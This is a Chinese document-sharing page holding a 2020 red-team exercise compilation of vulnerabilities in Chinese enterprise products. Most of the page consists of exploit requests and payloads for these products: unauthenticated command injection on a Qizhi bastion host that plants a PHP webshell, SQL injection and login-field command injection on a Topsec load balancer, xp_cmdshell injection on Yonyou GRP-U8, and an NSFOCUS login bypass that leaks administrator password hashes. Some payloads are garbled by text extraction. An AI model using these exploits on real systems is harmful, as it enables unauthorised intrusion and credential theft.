2020护网中的漏洞信息安全资料.pdfVIP

  1. 1、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。。
  2. 2、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载
  3. 3、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
  4. 4、该文档为VIP文档,如果想要下载,成为VIP会员后,下载免费。
  5. 5、成为VIP后,下载本文档将扣除1次下载权益。下载后,不支持退款、换文档。如有疑问请联系我们
  6. 6、成为VIP后,您将拥有八大权益,权益包括:VIP文档下载权益、阅读免打扰、文档格式转换、高级专利检索、专属身份标志、高级客服、多端互通、版权登记。
  7. 7、VIP文档为合作方或网友上传,每下载1次, 网站将根据用户上传文档的质量评分、类型等,对文档贡献者给予高额补贴、流量扶持。如果你也想贡献VIP文档。上传文档
查看更多

一、齐治堡垒机前远程命令执行漏洞(CNVD-2019-20835)

1、访问1/listener/cluster_manage.php:返回OK.(未授权无需登录)

2、访问如下链接即可获得getshell,执行成功后,生成PHP一句话马

0/ha_request.php?action=installipaddr=1node_id=1${IFS}|`echo${IFS}ZWNobyAnPD9waHAgQGV2YWw

3.getshell访问路径:

/var/www/shterm/resources/qrcode/lbj77.php

0/shterm/resources/qrcode/lbj77.php(密码10086)

据说还是另外一个版本是java的:

POST/shterm/listener/tui_update.php

a=[t;importos;os.popen(whoami)#]

二、天融信TopApp-LB负载均衡系统Sql注入漏洞

1.利用POC:

POST/acc/clsf/report/datasource.phpHTTP/1.1

Host:localhost

Connection:close

Accept:text/javascript,text/html,application/xml,text/xml,*/*

User-Agent:Mozilla/5.0(Macintosh;IntelMacOSX10_15_5)AppleWebKit/537.36(KHTML,likeGecko)Chrome/84.0.4147.105

Safari/537.36

Accept-Language:zh-CN,zh;q=0.9

Content-Type:application/x-www-form-urlencoded

t=le=0s=tl=1vid=1+unionselect1,2,3,4,5,6,7,8,9,substr(a,1,1),11,12,13,14,15,16,17,18,19,20,21,22--

+gid=0lmt=10o=r_Speedasc=falsep=8lipf=lipt=ripf=ript=dscp=proto=lpf=lpt=rpf=rpt=@。。

2.2个历史漏洞仍然可以复现。

/post/21626/

用户名随意密码:;id(天融信负载均衡TopApp-LB系统无需密码直接登陆)

/post/22193/

用户名:;ping9928;echo密码:任意

三、用友GRP-u8注入

利用POC:

POST/ProxyHTTP/1.1

Content-Type:application/x-www-form-urlencoded

User-Agent:Mozilla/4.0(compatible;MSIE6.0;)

Host:localhost

Content-Length:341

Connection:Keep-Alive

Cache-Control:no-cache

cVer=9.8.0dp=?xmlversion=1.0encoding=GB2312?R9PACKETversion=1DATAFORMATXML/DATAFORMAT

R9FUNCTIONNAMEAS_DataRequest/NAMEPARAMSPARAMNAMEProviderName/NAMEDATA

format=textDataSetProviderData/DATA/PARAMPARAMNAMEData/NAMEDATAformat=textexec

xp_cmdshellwhoami/DATA/PARAM/PARAMS/R9FUNCTION/R9PACKET

四、绿盟UTS综合威胁探针管理员任意登录

逻辑漏洞,利用方式参考:/archives/112.html

1、修改登录数据包{status:false,mag:}-{status:true,mag:}

2、/webapi/v1/system/accountmanage/account接口逻辑错误泄漏了管理员的账户信息包括密码(md5)

3、再次登录,替换密码上个数据包中md5密码

4、登录成功

漏洞实际案例:

对响应包进行修改,将false更改为true的时候可以泄露管理用户的md5值密码

利用渠道的md5值去登录页面

7ac301836522b54afcbbed714534c

文档评论(0)

qd002 + 关注
实名认证
文档贡献者

该用户很懒,什么也没介绍

1亿VIP精品文档

相关文档